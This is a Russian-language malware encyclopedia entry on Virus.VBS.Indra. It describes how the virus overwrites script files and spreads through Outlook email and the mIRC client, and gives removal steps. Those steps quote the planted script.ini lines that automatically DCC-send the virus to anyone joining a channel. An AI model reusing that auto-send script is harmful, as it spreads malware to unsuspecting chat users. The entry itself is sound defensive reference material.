Virus.VBS.Indra
Материал из Total Malware Info
Virus.VBS.Indra Вредоносная программа, заражающая VBS-файлы. Имеет размер 2 141 байт. Написана на скриптовом языке Visual Basic Script. Распространяется по электронной почте и через каналы IRC (Internet Relay Chat).
Деструктивная активность
Вирус в стандартом каталоге установки IRC-клиента "Mirc", изменяет файл настроек script.ini. Таким образом, что при подключении новых пользователей к каналу, в котором находится зараженный компьютер, будет осуществляется рассылка тела вируса.
C:\mirc\script.ini (Детектируется Антивирусом Касерского, как IRC-Worm.VBS.Generic)
Затем вредонос производит поиск файлов в текущем каталоге с расширением *.vbe. Все найденный файлы вирус перезаписывает своим телом.
Рассылка писем по электронной почте
Вирус распространяется через электронную почту, используя, почтовый клиент "MS Outlook". Сообщение имеет следующий вид: Тема:
qsdf
Тело письма:
Fdg
Во вложении:
тело_червя
Рекомендации по удалению
Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:
- Удалить оригинальный файл вируса (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
- В файле C:\mirc\script.ini удалить следующие строки:
[script]
n0=ON 1:JOIN:#:{ if ( $nick != $me ) {
n1=/dcc send $nick "c:\virus\7_????\<путь к вирусу>" }
